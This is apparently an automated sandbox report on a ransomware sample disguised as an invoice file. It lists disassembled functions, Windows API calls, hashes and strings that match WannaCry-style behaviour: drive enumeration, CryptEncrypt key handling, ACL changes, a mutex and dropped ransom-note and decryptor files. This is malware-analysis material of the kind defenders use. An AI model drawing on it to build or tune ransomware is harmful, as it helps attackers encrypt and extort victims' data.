                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CriticalSectionwcslen$FileLeave$??2@??3@AttributesDeleteEnterG@2@@std@@G@std@@Grow@?$basic_string@U?$char_traits@V?$allocator@
                                                            • String ID:
                                                            • API String ID: 784962118-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 100010D3
                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010EB
                                                            • TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001121
                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001128
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Process$Close$ChangeCodeCreateExitFindHandleNotificationObjectSingleTerminateWait
                                                            • String ID: D
                                                            • API String ID: 1516114815-2746444292
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • fopen.MSVCRT ref: 10005390
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000026B,00000000,00000000), ref: 100053BB
                                                            • fprintf.MSVCRT ref: 100053CC
                                                            • fclose.MSVCRT ref: 100053D3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidefclosefopenfprintf
                                                            • String ID: %s$f.wnry
                                                            • API String ID: 3959349042-164597620
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: fclose$fopenfreadfwrite
                                                            • String ID: c.wnry
                                                            • API String ID: 2140422903-3240288721
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,?,00000000,?,?,00000000,00000000), ref: 1000140A
                                                            • SetEntriesInAclA.ADVAPI32 ref: 1000145E
                                                            • SetSecurityInfo.ADVAPI32(?,00000006,00000004,00000000,00000000,00000001,00000000), ref: 10001471
                                                            • LocalFree.KERNEL32(?), ref: 10001482
                                                            • LocalFree.KERNEL32(00000001), ref: 10001489
                                                            • LocalFree.KERNEL32(?), ref: 10001490
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: FreeLocal$InfoSecurity$Entries
                                                            • String ID:
                                                            • API String ID: 3140748100-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GlobalAlloc.KERNELBASE(00000000,00100000,10005340,00000000,75AA0F00,00000000,1000580C,00000000.pky,10005340,1000DD8C,75AA0F10), ref: 10001869
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AllocGlobal
                                                            • String ID:
                                                            • API String ID: 3761449716-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLogicalDrives.KERNELBASE ref: 10005734
                                                            • Sleep.KERNELBASE(00000BB8), ref: 1000574A
                                                            • GetLogicalDrives.KERNELBASE ref: 10005752
                                                            • CreateThread.KERNEL32(00000000,00000000,10005680,00000003,00000000,00000000), ref: 1000578F
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000579A
                                                            • ExitThread.KERNEL32 ref: 100057B1
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: DrivesLogicalThread$CloseCreateExitHandleSleep
                                                            • String ID:
                                                            • API String ID: 1878306015-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • time.MSVCRT ref: 100049A8
                                                            • time.MSVCRT ref: 100049CC
                                                            • GetFullPathNameA.KERNEL32(tasksche.exe,00000208,?,00000000), ref: 10004A15
                                                            • Sleep.KERNELBASE(00007530), ref: 10004A29
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: time$FullNamePathSleep
                                                            • String ID: tasksche.exe
                                                            • API String ID: 1626198026-4155512336
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • sprintf.MSVCRT ref: 10004528
                                                            • GetFileAttributesA.KERNELBASE(?), ref: 1000453C
                                                            • GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
                                                              • Part of subcall function 10003A10: InitializeCriticalSection.KERNEL32(?,75AA3310,10004558), ref: 10003A28
                                                              • Part of subcall function 10003D10: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000200,?,?,?,?,75AA3310,00000000), ref: 10003E2B
                                                              • Part of subcall function 10003D10: _local_unwind2.MSVCRT ref: 10003E3B
                                                              • Part of subcall function 10003A60: DeleteCriticalSection.KERNEL32(?,100045A2), ref: 10003A6A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AttributesCriticalFileSection$CryptDeleteEncryptInitialize_local_unwind2sprintf
                                                            • String ID: %08X.dky$00000000.pky
                                                            • API String ID: 76522779-2125887231
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetTempFileNameW.KERNELBASE(?,~SD,00000000,00000000), ref: 10002FA1
                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000002,00000002,00000000), ref: 10002FBB
                                                            • CloseHandle.KERNEL32(00000000), ref: 10002FC8
                                                            • DeleteFileW.KERNELBASE(00000000), ref: 10002FD3
                                                            Strings
                                                            Similarity
                                                            • API ID: File$CloseCreateDeleteHandleNameTemp
                                                            • String ID: ~SD
                                                            • API String ID: 3375149446-1091114838
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileA.KERNELBASE(00000000.res,40000000,00000001,00000000,00000004,00000080,00000000,00000000,?,10005A09), ref: 10004749
                                                            • WriteFile.KERNELBASE(00000000), ref: 10004775
                                                            • CloseHandle.KERNEL32(00000000), ref: 1000477C
                                                            Strings
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleWrite
                                                            • String ID: 00000000.res
                                                            • API String ID: 1065093856-1337945038
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateFileA.KERNELBASE(00000000.res,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,10005C55,00000000.pky,00000000.eky), ref: 100046E6
                                                            • ReadFile.KERNEL32(00000000,1000DC68,00000088,?,00000000,?,10005C55,00000000.pky,00000000.eky), ref: 10004712
                                                            • CloseHandle.KERNEL32(00000000,?,10005C55,00000000.pky,00000000.eky), ref: 10004719
                                                            Strings
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleRead
                                                            • String ID: 00000000.res
                                                            • API String ID: 1035965006-1337945038
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 10005060: GetWindowsDirectoryW.KERNEL32(?,00000104,?,?), ref: 10005075
                                                              • Part of subcall function 10005060: GetTempPathW.KERNEL32(00000104,?), ref: 10005094
                                                              • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050A1
                                                              • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050AB
                                                              • Part of subcall function 10005060: wcslen.MSVCRT ref: 100050B9
                                                            • swprintf.MSVCRT(?,%s\hibsys%s,?,.WNCRYT), ref: 1000516A
                                                            • DeleteFileW.KERNELBASE(?), ref: 10005174
                                                            Strings
                                                            Similarity
                                                            • API ID: wcslen$DeleteDirectoryFilePathTempWindowsswprintf
                                                            • String ID: %s\hibsys%s$.WNCRYT
                                                            • API String ID: 1822766362-1629340253
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • CreateMutexA.KERNELBASE(00000000,00000001,MsWinZonesCacheCounterMutexA,?,10005B11), ref: 1000469A
                                                            • GetLastError.KERNEL32(?,10005B11), ref: 100046A6
                                                            • CloseHandle.KERNEL32(00000000,?,10005B11), ref: 100046B4
                                                            Strings
                                                            • MsWinZonesCacheCounterMutexA, xrefs: 10004691
                                                            Similarity
                                                            • API ID: CloseCreateErrorHandleLastMutex
                                                            • String ID: MsWinZonesCacheCounterMutexA
                                                            • API String ID: 4294037311-694093751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@Please_Read_Me@.txt), ref: 1000321A
                                                            • CopyFileW.KERNELBASE(@Please_Read_Me@.txt,?,00000001), ref: 1000322F
                                                            Strings
                                                            Similarity
                                                            • API ID: CopyFileswprintf
                                                            • String ID: %s\%s$@Please_Read_Me@.txt
                                                            • API String ID: 1805135926-3539309323
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe.lnk), ref: 1000325A
                                                            • CopyFileW.KERNELBASE(@WanaDecryptor@.exe.lnk,?,00000001), ref: 1000326F
                                                            Strings
                                                            Similarity
                                                            • API ID: CopyFileswprintf
                                                            • String ID: %s\%s$@WanaDecryptor@.exe.lnk
                                                            • API String ID: 1805135926-795331943
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.exe), ref: 1000329A
                                                            • CopyFileW.KERNELBASE(@WanaDecryptor@.exe,?,00000001), ref: 100032AF
                                                            Strings
                                                            Similarity
                                                            • API ID: CopyFileswprintf
                                                            • String ID: %s\%s$@WanaDecryptor@.exe
                                                            • API String ID: 1805135926-3253365116
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • ??2@YAPAXI@Z.MSVCRT ref: 1000281A
                                                              • Part of subcall function 10002300: ??2@YAPAXI@Z.MSVCRT ref: 10002332
                                                              • Part of subcall function 10002300: swprintf.MSVCRT ref: 10002388
                                                              • Part of subcall function 10002300: FindFirstFileW.KERNELBASE(?,?,?,00000000,00000000,?), ref: 1000239E
                                                              • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 100023D2
                                                              • Part of subcall function 10002300: ??3@YAXPAX@Z.MSVCRT ref: 10002404
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002899
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 100028FD
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10002917
                                                            Similarity
                                                            • API ID: ??3@$??2@$FileFindFirstswprintf
                                                            • String ID:
                                                            • API String ID: 47495585-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,75AA0F00,75AA0F00,00000000,00000000), ref: 100054B6
                                                            • wcslen.MSVCRT ref: 100054C3
                                                            • SHGetFolderPathW.SHELL32(00000000,00000005,00000000,00000000,?), ref: 100054F5
                                                            • wcslen.MSVCRT ref: 100054FC
                                                              • Part of subcall function 100027F0: ??2@YAPAXI@Z.MSVCRT ref: 1000281A
                                                              • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 100028FD
                                                              • Part of subcall function 100027F0: ??3@YAXPAX@Z.MSVCRT ref: 10002917
                                                            Similarity
                                                            • API ID: ??3@FolderPathwcslen$??2@
                                                            • String ID:
                                                            • API String ID: 2093780229-0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$DeleteFilewcslen
                                                            • String ID:
                                                            • API String ID: 3508958691-0
                                                            • Opcode ID: 922f722e5c418f7af27600eb4e498b6c2fd2021f8fe4a9803ef1495644ed2b51
                                                            • Instruction ID: 7a28d7368fef7b69181b6a677d113c0d8526011b338f6f6515615cb3a9903244
                                                            • Opcode Fuzzy Hash: 922f722e5c418f7af27600eb4e498b6c2fd2021f8fe4a9803ef1495644ed2b51
                                                            • Instruction Fuzzy Hash: 9EE01A70D021289BEF15EB74CD885DD77B8BB143E5F510691FA2AE20E8D7349F868B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: NameUser_wcsicmp
                                                            • String ID:
                                                            • API String ID: 46677947-0
                                                            • Opcode ID: 3af6ba93c841a6dfec5909aa4c30899397575f505b83a40fa5704630c05f9164
                                                            • Instruction ID: 442cefb67fd77dc7d4c6c862235f07921af60ab383b0b3296d28c7faf1cdecfa
                                                            • Opcode Fuzzy Hash: 3af6ba93c841a6dfec5909aa4c30899397575f505b83a40fa5704630c05f9164
                                                            • Instruction Fuzzy Hash: 7DF0C875508341ABE710DB54C888BAFB3A4FFD4740F00882CF5AC432A5E6759544CB52
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 10001080: CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 100010D3
                                                              • Part of subcall function 10001080: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010EB
                                                              • Part of subcall function 10001080: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 100010FC
                                                              • Part of subcall function 10001080: GetExitCodeProcess.KERNEL32(?,?), ref: 10001110
                                                              • Part of subcall function 10001080: FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001121
                                                              • Part of subcall function 10001080: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,00000000), ref: 10001128
                                                            • Sleep.KERNELBASE(00007530), ref: 10005326
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: Process$Close$ChangeCodeCreateExitFindHandleNotificationObjectSingleSleepTerminateWait
                                                            • String ID: taskdl.exe
                                                            • API String ID: 560332639-3879089904
                                                            • Opcode ID: 51d646c9bd2edbf85fdfc6af582cba98f12fd6c8ac893db1c951d156dd274f2d
                                                            • Instruction ID: d6b831c00407921d731d2983abcfaeab2a0bbf5aee0f41f70865c78235a7e0dd
                                                            • Opcode Fuzzy Hash: 51d646c9bd2edbf85fdfc6af582cba98f12fd6c8ac893db1c951d156dd274f2d
                                                            • Instruction Fuzzy Hash: 52D01271B2812197F340E7795C41B8732D4A7106D1F114623F554D31DCEAD1E9008575
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                              • Part of subcall function 10004500: sprintf.MSVCRT ref: 10004528
                                                              • Part of subcall function 10004500: GetFileAttributesA.KERNELBASE(?), ref: 1000453C
                                                              • Part of subcall function 10004500: GetFileAttributesA.KERNEL32(00000000.pky), ref: 10004548
                                                            • Sleep.KERNELBASE(00001388), ref: 100045E3
                                                            • ExitThread.KERNEL32 ref: 100045E9
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile$ExitSleepThreadsprintf
                                                            • String ID:
                                                            • API String ID: 3028760467-0
                                                            • Opcode ID: 5e3f6d6ed5a0ad8cdc5edd1a5f4ca14f1afc00218b5e324edc674d1ee7b02308
                                                            • Instruction ID: 7f71a9df7b11f8961ba65e8475ca60af5bbcfddb40bc2544ede7146ac3c113f8
                                                            • Opcode Fuzzy Hash: 5e3f6d6ed5a0ad8cdc5edd1a5f4ca14f1afc00218b5e324edc674d1ee7b02308
                                                            • Instruction Fuzzy Hash: C1D0A7F5804F22D7F302A7A59C4174E36A8BF447C1F070116F5089315AEE60A6008F66
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GlobalFree.KERNEL32(?), ref: 10004158
                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 10004167
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindFreeGlobalNotification
                                                            • String ID:
                                                            • API String ID: 397936838-0
                                                            • Opcode ID: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction ID: 6e5334fcabd99f70dbee0bd7ab8d8fb6890c89af135d3bc21c4c58ce30c3f96f
                                                            • Opcode Fuzzy Hash: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction Fuzzy Hash: CFC00270E0062597EF40DB748D88DDD77B9BB543F57124610F425E25D4DB38D8C58924
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GlobalFree.KERNEL32(?), ref: 10003FFB
                                                            • FindCloseChangeNotification.KERNELBASE(?), ref: 1000400A
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ChangeCloseFindFreeGlobalNotification
                                                            • String ID:
                                                            • API String ID: 397936838-0
                                                            • Opcode ID: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction ID: cde0e7c9d00266dd521057b441dd1465dd06113e1ffa8f738b3e980e73fa046c
                                                            • Opcode Fuzzy Hash: 95c6753cd6a729dbd2e938d525553f3bf1bc6ee1f9d914f0cf534606ea1e53d3
                                                            • Instruction Fuzzy Hash: 7BC00270D0011597EF50DB748C88ADD77B9BB043E17114610F565F25E4DB39D8D58924
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017076372.000000001000C000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3017220316.000000001000E000.00000002.00001000.00020000.00000000.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_10_2_10000000_Proforma Invoice and Bank swift-REG.jbxd
                                                            Similarity
                                                            • API ID: ??2@
                                                            • String ID:
                                                            • API String ID: 1033339047-0
                                                            • Opcode ID: 74eacbc20383896c45a81761181eb09298f2ecdfe049397aa81faf53124bbe71
                                                            • Instruction ID: a15c0a293f5e24c1dea9984ccd3df6ccb11cefa01a4d594410c7fe3b55cc443a
                                                            • Opcode Fuzzy Hash: 74eacbc20383896c45a81761181eb09298f2ecdfe049397aa81faf53124bbe71
                                                            • Instruction Fuzzy Hash: E1F08CF66042018F9B09CF18C05096AB7EAEFC87A0B16806DE80EDB391DB70AC01CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryA.KERNEL32(advapi32.dll,7598A710,10003416,7598A710,10005BA1), ref: 10004456
                                                            • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 10004473
                                                            • GetProcAddress.KERNEL32(00000000,CryptImportKey), ref: 10004480
                                                            • GetProcAddress.KERNEL32(00000000,CryptDestroyKey), ref: 1000448D
                                                            • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 1000449A
                                                            • GetProcAddress.KERNEL32(00000000,CryptDecrypt), ref: 100044A7
                                                            • GetProcAddress.KERNEL32(00000000,CryptGenKey), ref: 100044B4
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000A.00000002.3016843248.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 0000000A.00000002.3016764861.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                            • Associated: 0000000A.00000002.3016943004.0000000010007000.00000002.00001000.00020000.00000000.sdmp
